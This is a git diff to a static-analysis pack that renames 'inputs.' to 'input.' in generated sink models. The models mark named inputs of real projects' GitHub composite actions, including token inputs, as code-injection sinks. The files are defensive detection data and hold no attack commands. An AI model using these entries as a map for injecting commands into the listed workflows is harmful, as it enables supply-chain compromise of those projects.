+- .../reusable-workflows/etcd-io_etcd.model.yml | 8 ++-- .../eventstore_eventstore.model.yml | 4 +- .../expensify_app.model.yml | 2 +- ...xternal-secrets_external-secrets.model.yml | 4 +- .../facebook_create-react-app.model.yml | 2 +- .../facebookresearch_xformers.model.yml | 20 ++++---- .../falcosecurity_falco.model.yml | 12 ++--- .../fastify_fastify.model.yml | 2 +- .../ferretdb_ferretdb.model.yml | 2 +- .../filecoin-project_venus.model.yml | 8 ++-- .../firebase_firebase-unity-sdk.model.yml | 28 +++++------ .../flarum_framework.model.yml | 2 +- .../fluent_fluent-bit.model.yml | 16 +++---- .../flux-iac_tofu-controller.model.yml | 2 +- .../flyteorg_flyte.model.yml | 6 +-- .../foundatiofx_foundatio.model.yml | 6 +-- .../freecad_freecad.model.yml | 2 +- .../getpelican_pelican.model.yml | 6 +-- .../getporter_porter.model.yml | 2 +- .../getsentry_sentry-dart.model.yml | 4 +- .../getsentry_sentry-unity.model.yml | 4 +- .../gitpod-io_gitpod.model.yml | 2 +- .../gittools_gitversion.model.yml | 2 +- ...ooglecloudplatform_magic-modules.model.yml | 2 +- ...loudplatform_nodejs-docs-samples.model.yml | 4 +- .../gravitational_teleport.model.yml | 2 +- .../gravitl_netmaker.model.yml | 2 +- .../reusable-workflows/h2oai_wave.model.yml | 6 +-- .../hadashia_vcontainer.model.yml | 4 +- .../hashicorp_boundary.model.yml | 2 +- .../hashicorp_consul.model.yml | 4 +- .../hashicorp_terraform-cdk.model.yml | 20 ++++---- ...hashicorp_terraform-provider-tfe.model.yml | 2 +- .../hashicorp_terraform.model.yml | 8 ++-- .../hashicorp_vault.model.yml | 22 ++++----- .../reusable-workflows/heroku_cli.model.yml | 4 +- .../hitobito_hitobito.model.yml | 4 +- .../home-assistant_operating-system.model.yml | 4 +- .../homuler_mediapipeunityplugin.model.yml | 12 ++--- .../huggingface_doc-builder.model.yml | 18 +++---- .../huggingface_transformers.model.yml | 4 +- .../hyperion-project_hyperion.ng.model.yml | 6 +-- .../reusable-workflows/ibm_sarama.model.yml | 2 +- 
...nloader_icloud_photos_downloader.model.yml | 2 +- .../immich-app_immich.model.yml | 2 +- .../reusable-workflows/inria_spoon.model.yml | 2 +- ...el-device-plugins-for-kubernetes.model.yml | 2 +- .../inverse-inc_packetfence.model.yml | 2 +- .../reusable-workflows/ispc_ispc.model.yml | 2 +- ..._intellij-platform-gradle-plugin.model.yml | 2 +- .../jupyter_docker-stacks.model.yml | 16 +++---- .../kairos-io_kairos.model.yml | 36 +++++++------- .../kanidm_kanidm.model.yml | 2 +- .../kata-containers_kata-containers.model.yml | 30 ++++++------ .../reusable-workflows/kiali_kiali.model.yml | 22 ++++----- .../kotest_kotest.model.yml | 2 +- .../kubernetes_ingress-nginx.model.yml | 4 +- .../kubescape_kubescape.model.yml | 8 ++-- .../kubeshop_botkube.model.yml | 4 +- .../reusable-workflows/kumahq_kuma.model.yml | 8 ++-- .../labring_sealos.model.yml | 20 ++++---- .../laion-ai_open-assistant.model.yml | 2 +- .../learningequality_kolibri.model.yml | 8 ++-- .../lensesio_stream-reactor.model.yml | 2 +- .../leptos-rs_leptos.model.yml | 6 +-- .../lightning-ai_pytorch-lightning.model.yml | 4 +- .../liquibase_liquibase.model.yml | 2 +- .../litestar-org_litestar.model.yml | 4 +- .../reusable-workflows/llvm_circt.model.yml | 16 +++---- .../lnbits_lnbits.model.yml | 2 +- .../lutris_lutris.model.yml | 2 +- .../reusable-workflows/mailu_mailu.model.yml | 6 +-- .../mamba-org_mamba.model.yml | 4 +- ...anticoresoftware_manticoresearch.model.yml | 18 +++---- .../marcelotduarte_cx_freeze.model.yml | 2 +- ...xaml_materialdesigninxamltoolkit.model.yml | 8 ++-- .../matter-labs_zksync-era.model.yml | 4 +- .../mattermost_desktop.model.yml | 2 +- .../mattermost_mattermost.model.yml | 10 ++-- .../mealie-recipes_mealie.model.yml | 2 +- .../meshery_meshery.model.yml | 22 ++++----- .../meshtastic_firmware.model.yml | 10 ++-- .../microcks_microcks.model.yml | 2 +- ...crosoft_applicationinsights-java.model.yml | 2 +- .../microsoft_chat-copilot.model.yml | 12 ++--- .../microsoft_msquic.model.yml | 26 
+++++----- .../microsoft_oryx.model.yml | 2 +- .../microsoft_pr-metrics.model.yml | 2 +- ...oft_react-native-windows-samples.model.yml | 16 +++---- .../microsoft_vscode-cpptools.model.yml | 2 +- .../moby_buildkit.model.yml | 10 ++-- .../reusable-workflows/moby_moby.model.yml | 4 +- .../mosaicml_composer.model.yml | 12 ++--- .../msys2_setup-msys2.model.yml | 4 +- .../mudler_localai.model.yml | 4 +- .../mustardchef_wsabuilds.model.yml | 20 ++++---- .../reusable-workflows/n8n-io_n8n.model.yml | 2 +- .../napari_napari.model.yml | 2 +- .../reusable-workflows/nasa_fprime.model.yml | 8 ++-- .../nautobot_nautobot.model.yml | 2 +- .../reusable-workflows/nektos_act.model.yml | 16 +++---- .../neovim_neovim.model.yml | 2 +- .../nethermindeth_nethermind.model.yml | 12 ++--- .../newrelic_newrelic-dotnet-agent.model.yml | 10 ++-- .../newrelic_newrelic-java-agent.model.yml | 4 +- .../newrelic_node-newrelic.model.yml | 8 ++-- .../nexus-mods_nexusmods.app.model.yml | 8 ++-- .../nginxinc_kubernetes-ingress.model.yml | 22 ++++----- .../nocodb_nocodb.model.yml | 4 +- .../reusable-workflows/novuhq_novu.model.yml | 30 ++++++------ .../npm_abbrev-js.model.yml | 2 +- .../reusable-workflows/npm_cli.model.yml | 4 +- .../npm_fs-minipass.model.yml | 2 +- .../npm_hosted-git-info.model.yml | 2 +- .../reusable-workflows/npm_ini.model.yml | 2 +- ...pm_json-parse-even-better-errors.model.yml | 2 +- .../npm_minify-registry-metadata.model.yml | 2 +- .../npm_mute-stream.model.yml | 2 +- .../npm_node-semver.model.yml | 2 +- .../npm_node-which.model.yml | 2 +- .../reusable-workflows/npm_nopt.model.yml | 2 +- .../npm_normalize-package-data.model.yml | 2 +- .../npm_write-file-atomic.model.yml | 2 +- .../onflow_cadence.model.yml | 8 ++-- .../open-goal_jak-project.model.yml | 12 ++--- ...pen-telemetry_opentelemetry-demo.model.yml | 2 +- ...try_opentelemetry-dotnet-contrib.model.yml | 4 +- ...n-telemetry_opentelemetry-dotnet.model.yml | 4 +- ...entelemetry-java-instrumentation.model.yml | 4 +- 
...lemetry_opentelemetry-js-contrib.model.yml | 2 +- ...telemetry_opentelemetry-operator.model.yml | 6 +-- .../openbao_openbao.model.yml | 12 ++--- .../openhab_openhab-docs.model.yml | 8 ++-- .../openmined_pysyft.model.yml | 4 +- .../opentofu_opentofu.model.yml | 8 ++-- .../openttd_openttd.model.yml | 24 +++++----- .../openvinotoolkit_openvino.model.yml | 2 +- .../reusable-workflows/openxla_iree.model.yml | 14 +++--- .../reusable-workflows/openzfs_zfs.model.yml | 2 +- ...ator-framework_java-operator-sdk.model.yml | 6 +-- .../orange-opensource_hurl.model.yml | 2 +- ...aolosalvatori_servicebusexplorer.model.yml | 4 +- .../parcel-bundler_parcel.model.yml | 2 +- .../pardeike_harmony.model.yml | 2 +- .../reusable-workflows/pcsx2_pcsx2.model.yml | 14 +++--- .../pennylaneai_pennylane.model.yml | 6 +-- ...necone-io_pinecone-python-client.model.yml | 2 +- .../pixie-io_pixie.model.yml | 6 +-- .../plantuml_plantuml.model.yml | 2 +- .../powerdns_pdns.model.yml | 6 +-- .../preactjs_preact.model.yml | 4 +- .../prismlauncher_prismlauncher.model.yml | 2 +- .../product-os_flowzone.model.yml | 2 +- .../project-oak_oak.model.yml | 4 +- .../reusable-workflows/prql_prql.model.yml | 2 +- .../pulumi_pulumi.model.yml | 10 ++-- .../puppetlabs_puppetlabs-puppetdb.model.yml | 6 +-- .../reusable-workflows/pyo3_maturin.model.yml | 2 +- .../reusable-workflows/pyo3_pyo3.model.yml | 2 +- .../python_cpython.model.yml | 4 +- .../pytorch_botorch.model.yml | 2 +- .../reusable-workflows/pytorch_xla.model.yml | 2 +- .../quarto-dev_quarto-cli.model.yml | 2 +- .../rancher_dashboard.model.yml | 8 ++-- .../rasterio_rasterio.model.yml | 2 +- .../redisearch_redisearch.model.yml | 2 +- .../remix-run_remix.model.yml | 2 +- .../rmcrackan_libation.model.yml | 8 ++-- .../rocketchat_rocket.chat.model.yml | 2 +- .../ruby_ruby.wasm.model.yml | 2 +- .../rustdesk_rustdesk.model.yml | 6 +-- .../saadeghi_daisyui.model.yml | 4 +- .../sagemath_sage.model.yml | 14 +++--- .../schemastore_schemastore.model.yml | 4 +- 
.../scikit-learn_scikit-learn.model.yml | 2 +- .../seleniumhq_selenium.model.yml | 4 +- .../shaka-project_shaka-packager.model.yml | 6 +-- .../shaka-project_shaka-player.model.yml | 8 ++-- .../shimataro_ssh-key-action.model.yml | 2 +- .../softfever_orcaslicer.model.yml | 4 +- ...-mansion_react-native-reanimated.model.yml | 2 +- .../solana-labs_solana.model.yml | 2 +- .../sonarr_sonarr.model.yml | 4 +- .../speedb-io_speedb.model.yml | 4 +- ...ring-cloud_spring-cloud-dataflow.model.yml | 2 +- .../sqlfluff_sqlfluff.model.yml | 6 +-- .../stdlib-js_stdlib.model.yml | 8 ++-- .../stereokit_stereokit.model.yml | 10 ++-- .../streetsidesoftware_cspell.model.yml | 2 +- .../supabase_auth.model.yml | 2 +- .../reusable-workflows/supabase_cli.model.yml | 2 +- .../tencent_hippy.model.yml | 8 ++-- .../tgstation_tgstation.model.yml | 6 +-- .../thesofproject_sof.model.yml | 2 +- .../tiann_kernelsu.model.yml | 6 +-- .../tiledb-inc_tiledb.model.yml | 4 +- .../toeverything_affine.model.yml | 2 +- .../tracel-ai_burn.model.yml | 2 +- .../tribler_tribler.model.yml | 2 +- .../ubisoft_sharpmake.model.yml | 4 +- .../unity-technologies_ml-agents.model.yml | 2 +- .../reusable-workflows/urbit_urbit.model.yml | 4 +- .../uyuni-project_uyuni.model.yml | 4 +- .../vert-x3_vertx-hazelcast.model.yml | 4 +- .../reusable-workflows/vkcom_vkui.model.yml | 2 +- .../walletconnect_web3modal.model.yml | 2 +- .../warzone2100_warzone2100.model.yml | 2 +- .../wasmedge_wasmedge.model.yml | 10 ++-- .../web-infra-dev_rspack.model.yml | 4 +- .../reusable-workflows/werf_werf.model.yml | 32 ++++++------- .../widdix_aws-cf-templates.model.yml | 2 +- .../wildfly_wildfly.model.yml | 8 ++-- .../yt-dlp_yt-dlp.model.yml | 12 ++--- .../zenml-io_zenml.model.yml | 6 +-- .../zephyrproject-rtos_zephyr.model.yml | 2 +- .../zitadel_zitadel.model.yml | 8 ++-- 597 files changed, 1937 insertions(+), 1937 deletions(-) 
diff --git a/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml b/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml index 4bc9d5ed771..877543ea8e4 100644 --- a/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml +++ b/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml 
@@ -3,12 +3,12 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["actions/actions-runner-controller", "*", "inputs.image-tag", "code-injection", "generated"] - - ["actions/actions-runner-controller", "*", "inputs.image-name", "code-injection", "generated"] - - ["actions/actions-runner-controller", "*", "inputs.arc-controller-namespace", "code-injection", "generated"] - - ["actions/actions-runner-controller", "*", "inputs.arc-namespace", "code-injection", "generated"] - - ["actions/actions-runner-controller", "*", "inputs.arc-name", "code-injection", "generated"] - - ["actions/actions-runner-controller", "*", "inputs.repo-name", "code-injection", "generated"] - - ["actions/actions-runner-controller", "*", "inputs.repo-owner", "code-injection", "generated"] - - ["actions/actions-runner-controller", "*", "inputs.workflow-file", "code-injection", "generated"] - - ["actions/actions-runner-controller", "*", "inputs.auth-token", "code-injection", "generated"] \ No newline at end of file + - ["actions/actions-runner-controller", "*", "input.image-tag", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "input.image-name", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "input.arc-controller-namespace", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "input.arc-namespace", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "input.arc-name", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "input.repo-name", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "input.repo-owner", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "input.workflow-file", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "input.auth-token", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/adap_flower.model.yml b/ql/lib/ext/generated/composite-actions/adap_flower.model.yml index 3ce17568490..1c9d4a7f6d9 100644 --- a/ql/lib/ext/generated/composite-actions/adap_flower.model.yml +++ b/ql/lib/ext/generated/composite-actions/adap_flower.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["adap/flower", "*", "inputs.poetry-version", "code-injection", "generated"] - - ["adap/flower", "*", "inputs.setuptools-version", "code-injection", "generated"] - - ["adap/flower", "*", "inputs.pip-version", "code-injection", "generated"] - - ["adap/flower", "*", "inputs.python-version", "code-injection", "generated"] \ No newline at end of file + - ["adap/flower", "*", "input.poetry-version", "code-injection", "generated"] + - ["adap/flower", "*", "input.setuptools-version", "code-injection", "generated"] + - ["adap/flower", "*", "input.pip-version", "code-injection", "generated"] + - ["adap/flower", "*", "input.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml b/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml index 80a23352e55..a9d65724735 100644 --- a/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml 
@@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["agoric/agoric-sdk", "*", "inputs.xsnap-random-init", "code-injection", "generated"] - - ["agoric/agoric-sdk", "*", "inputs.path", "code-injection", "generated"] - - ["agoric/agoric-sdk", "*", "inputs.ignore-endo-branch", "code-injection", "generated"] - - ["agoric/agoric-sdk", "*", "inputs.codecov-token", "code-injection", "generated"] - - ["agoric/agoric-sdk", "*", "inputs.datadog-token", "code-injection", "generated"] - - ["agoric/agoric-sdk", "*", "inputs.datadog-site", "code-injection", "generated"] \ No newline at end of file + - ["agoric/agoric-sdk", "*", "input.xsnap-random-init", "code-injection", "generated"] + - ["agoric/agoric-sdk", "*", "input.path", "code-injection", "generated"] + - ["agoric/agoric-sdk", "*", "input.ignore-endo-branch", "code-injection", "generated"] + - ["agoric/agoric-sdk", "*", "input.codecov-token", "code-injection", "generated"] + - ["agoric/agoric-sdk", "*", "input.datadog-token", "code-injection", "generated"] + - ["agoric/agoric-sdk", "*", "input.datadog-site", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml b/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml index 441c8ebcd52..d40014b9a12 100644 --- a/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml +++ b/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["airbnb/lottie-ios", "*", "inputs.xcode", "code-injection", "generated"] \ No newline at end of file + - ["airbnb/lottie-ios", "*", "input.xcode", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml b/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml index d4e8a2c32bf..7452ddc2187 100644 
--- a/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml +++ b/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["airbytehq/airbyte", "*", "inputs.options", "code-injection", "generated"] - - ["airbytehq/airbyte", "*", "inputs.subcommand", "code-injection", "generated"] \ No newline at end of file + - ["airbytehq/airbyte", "*", "input.options", "code-injection", "generated"] + - ["airbytehq/airbyte", "*", "input.subcommand", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml b/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml index ce3ed699b9a..a91d2c7b0e5 100644 --- a/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["amazon-ion/ion-java", "*", "inputs.project_version", "code-injection", "generated"] - - ["amazon-ion/ion-java", "*", "inputs.repo", "code-injection", "generated"] \ No newline at end of file + - ["amazon-ion/ion-java", "*", "input.project_version", "code-injection", "generated"] + - ["amazon-ion/ion-java", "*", "input.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml b/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml index 8b62fe8e0aa..95b5ba13ad1 100644 --- a/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml +++ b/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["anchore/grype", "*", "inputs.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file + - ["anchore/grype", "*", "input.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml b/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml index 946faca35c9..7157e1bea48 100644 --- a/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml +++ b/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["anchore/syft", "*", "inputs.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file + - ["anchore/syft", "*", "input.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml b/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml index b68c9462c1b..a3f43d524b4 100644 --- a/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml +++ b/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml 
@@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["angular/dev-infra", "*", "inputs.firebase-public-dir", "code-injection", "generated"] - - ["angular/dev-infra", "*", "inputs.workflow-artifact-name", "code-injection", "generated"] - - ["angular/dev-infra", "*", "inputs.artifact-build-revision", "code-injection", "generated"] - - ["angular/dev-infra", "*", "inputs.pull-number", "code-injection", "generated"] - - ["angular/dev-infra", "*", "inputs.deploy-directory", "code-injection", "generated"] \ No newline at end of file + - ["angular/dev-infra", "*", "input.firebase-public-dir", "code-injection", "generated"] + - ["angular/dev-infra", "*", "input.workflow-artifact-name", "code-injection", "generated"] + - ["angular/dev-infra", "*", "input.artifact-build-revision", "code-injection", "generated"] + - ["angular/dev-infra", "*", "input.pull-number", "code-injection", "generated"] + - ["angular/dev-infra", "*", "input.deploy-directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml b/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml index aedefc9ee02..6e0d980943a 100644 --- a/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml +++ b/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ansible/ansible-lint", "*", "inputs.args", "code-injection", "generated"] - - ["ansible/ansible-lint", "*", "inputs.working_directory", "code-injection", "generated"] \ No newline at end of file + - ["ansible/ansible-lint", "*", "input.args", "code-injection", "generated"] + - ["ansible/ansible-lint", "*", "input.working_directory", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml b/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml index 36f7a18e198..ef682ff4fff 100644 --- a/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml +++ b/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ansible/awx", "*", "inputs.log-filename", "code-injection", "generated"] - - ["ansible/awx", "*", "inputs.github-token", "code-injection", "generated"] \ No newline at end of file + - ["ansible/awx", "*", "input.log-filename", "code-injection", "generated"] + - ["ansible/awx", "*", "input.github-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml index a1d324f44bd..7ce84599d17 100644 --- a/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["apache/arrow-datafusion", "*", "inputs.rust-version", "code-injection", "generated"] \ No newline at end of file + - ["apache/arrow-datafusion", "*", "input.rust-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml index 53142801fec..47f1c83016f 100644 --- a/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["apache/arrow-rs", "*", "inputs.target", "code-injection", "generated"] - - ["apache/arrow-rs", "*", "inputs.rust-version", "code-injection", "generated"] \ No newline at end of file + - ["apache/arrow-rs", "*", "input.target", "code-injection", "generated"] + - ["apache/arrow-rs", "*", "input.rust-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml index 5170beb3a7a..54353368db2 100644 --- a/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["apache/arrow", "*", "inputs.upload", "code-injection", "generated"] \ No newline at end of file + - ["apache/arrow", "*", "input.upload", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml b/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml index 1fabdd9085b..119115c1560 100644 --- a/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["apache/bookkeeper", "*", "inputs.mode", "code-injection", "generated"] \ No newline at end of file + - ["apache/bookkeeper", "*", "input.mode", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml b/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml index 370d3c6954e..762623ed27e 100644 --- a/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["apache/brpc", "*", "inputs.options", "code-injection", "generated"] \ No newline at end of file + - ["apache/brpc", "*", "input.options", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml b/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml index ac0156b719f..2272d7ff8e6 100644 --- a/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml 
@@ -3,15 +3,15 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["apache/camel-k", "*", "inputs.test-suite", "code-injection", "generated"] - - ["apache/camel-k", "*", "inputs.image-version", "code-injection", "generated"] - - ["apache/camel-k", "*", "inputs.image-registry-insecure", "code-injection", "generated"] - - ["apache/camel-k", "*", "inputs.image-name", "code-injection", "generated"] - - ["apache/camel-k", "*", "inputs.image-registry-host", "code-injection", "generated"] - - ["apache/camel-k", "*", "inputs.catalog-source-namespace", "code-injection", "generated"] - - ["apache/camel-k", "*", "inputs.catalog-source-name", "code-injection", "generated"] - - ["apache/camel-k", "*", "inputs.image-namespace", "code-injection", "generated"] - - ["apache/camel-k", "*", "inputs.version", "code-injection", "generated"] - - ["apache/camel-k", "*", "inputs.otlp-collector-image-version", "code-injection", "generated"] - - ["apache/camel-k", "*", "inputs.otlp-collector-image-name", "code-injection", "generated"] - - ["apache/camel-k", "*", "inputs.global-operator-namespace", "code-injection", "generated"] \ No newline at end of file + - ["apache/camel-k", "*", "input.test-suite", "code-injection", "generated"] + - ["apache/camel-k", "*", "input.image-version", "code-injection", "generated"] + - ["apache/camel-k", "*", "input.image-registry-insecure", "code-injection", "generated"] + - ["apache/camel-k", "*", "input.image-name", "code-injection", "generated"] + - ["apache/camel-k", "*", "input.image-registry-host", "code-injection", "generated"] + - ["apache/camel-k", "*", "input.catalog-source-namespace", "code-injection", "generated"] + - ["apache/camel-k", "*", "input.catalog-source-name", "code-injection", "generated"] + - ["apache/camel-k", "*", "input.image-namespace", "code-injection", "generated"] + - ["apache/camel-k", "*", "input.version", "code-injection", "generated"] + - ["apache/camel-k", "*", 
"input.otlp-collector-image-version", "code-injection", "generated"] + - ["apache/camel-k", "*", "input.otlp-collector-image-name", "code-injection", "generated"] + - ["apache/camel-k", "*", "input.global-operator-namespace", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_camel.model.yml b/ql/lib/ext/generated/composite-actions/apache_camel.model.yml index 9ee197ed884..3537169892a 100644 --- a/ql/lib/ext/generated/composite-actions/apache_camel.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_camel.model.yml @@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["apache/camel", "*", "inputs.end-commit", "code-injection", "generated"] - - ["apache/camel", "*", "inputs.start-commit", "code-injection", "generated"] - - ["apache/camel", "*", "inputs.distribution", "code-injection", "generated"] - - ["apache/camel", "*", "inputs.version", "code-injection", "generated"] - - ["apache/camel", "*", "inputs.pr-id", "code-injection", "generated"] - - ["apache/camel", "*", "inputs.mode", "code-injection", "generated"] \ No newline at end of file + - ["apache/camel", "*", "input.end-commit", "code-injection", "generated"] + - ["apache/camel", "*", "input.start-commit", "code-injection", "generated"] + - ["apache/camel", "*", "input.distribution", "code-injection", "generated"] + - ["apache/camel", "*", "input.version", "code-injection", "generated"] + - ["apache/camel", "*", "input.pr-id", "code-injection", "generated"] + - ["apache/camel", "*", "input.mode", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_flink.model.yml b/ql/lib/ext/generated/composite-actions/apache_flink.model.yml index 99a1e4cec71..dfac696dddf 100644 --- a/ql/lib/ext/generated/composite-actions/apache_flink.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_flink.model.yml 
@@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["apache/flink", "*", "inputs.maven-parameters", "code-injection", "generated"] - - ["apache/flink", "*", "inputs.env", "code-injection", "generated"] - - ["apache/flink", "*", "inputs.target_directory", "code-injection", "generated"] - - ["apache/flink", "*", "inputs.source_directory", "code-injection", "generated"] - - ["apache/flink", "*", "inputs.jdk_version", "code-injection", "generated"] \ No newline at end of file + - ["apache/flink", "*", "input.maven-parameters", "code-injection", "generated"] + - ["apache/flink", "*", "input.env", "code-injection", "generated"] + - ["apache/flink", "*", "input.target_directory", "code-injection", "generated"] + - ["apache/flink", "*", "input.source_directory", "code-injection", "generated"] + - ["apache/flink", "*", "input.jdk_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml b/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml index d2a6dbd4929..5c82922c35e 100644 --- a/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["apache/nuttx", "*", "inputs.haskell", "code-injection", "generated"] - - ["apache/nuttx", "*", "inputs.dotnet", "code-injection", "generated"] - - ["apache/nuttx", "*", "inputs.android", "code-injection", "generated"] \ No newline at end of file + - ["apache/nuttx", "*", "input.haskell", "code-injection", "generated"] + - ["apache/nuttx", "*", "input.dotnet", "code-injection", "generated"] + - ["apache/nuttx", "*", "input.android", "code-injection", "generated"] \ No newline at end of file 
